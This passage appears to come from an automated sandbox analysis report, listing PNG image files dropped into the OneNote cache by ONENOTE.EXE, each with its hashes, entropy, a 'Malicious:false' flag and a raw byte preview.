                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
